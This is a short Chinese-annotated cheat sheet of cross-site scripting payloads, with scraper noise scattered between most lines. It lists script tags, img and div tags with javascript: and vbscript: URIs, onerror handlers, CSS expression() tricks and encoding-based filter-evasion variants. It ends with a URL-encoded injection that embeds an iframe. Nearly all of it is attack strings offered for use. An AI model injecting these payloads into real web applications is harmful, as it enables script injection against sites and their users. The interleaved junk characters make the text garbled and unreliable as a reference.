<script>alert("跨站")</script> (最常用)) R6 q7 `1 B/ D& t' y2 G7 c7 f
<img scr=javascript:alert("跨站")></img>, I4 N0 \. z6 A2 w
<img scr="javascript: alert(/跨站/)></img>- p' r- ^" h O/ M# ?
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
. X& B g9 \8 E9 ^/ m; o" s5 H<img scr="#" onerror=alert(/跨站/)></img>3 G5 h T- n2 V+ }- _7 o6 w: S; v
<img scr="#" style="xss:expression(alert(/xss/));"></img>
. _( M: F4 j+ n5 @! Y# i<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ \# U; i s+ h<img src=vbscript:msgbox ("xss")></img>
" t0 J4 A" q+ K0 n& W! I<style> input {left:expression (alert('xss'))}</style>/ t* w: I6 Y+ q0 \8 t2 t
<div style={left:expression (alert('xss'))}></div>
* ]/ m0 k1 a7 Y7 x<div style={left:exp/* */ression (alert('xss'))}></div>
5 Y" m U4 H4 A. S* \0 s<div style={left:\0065\0078ression (alert('xss'))}></div>
" I n6 H6 _! U, Dhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
: b% S0 x% O4 Sunicode <div style="{left:expRessioN (alert('xss'))}">7 K2 s# y- F: z6 H+ L
; n0 P2 C8 L2 m ~9 t" E) {: c5 Y
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
' y. O/ I0 O! ^ |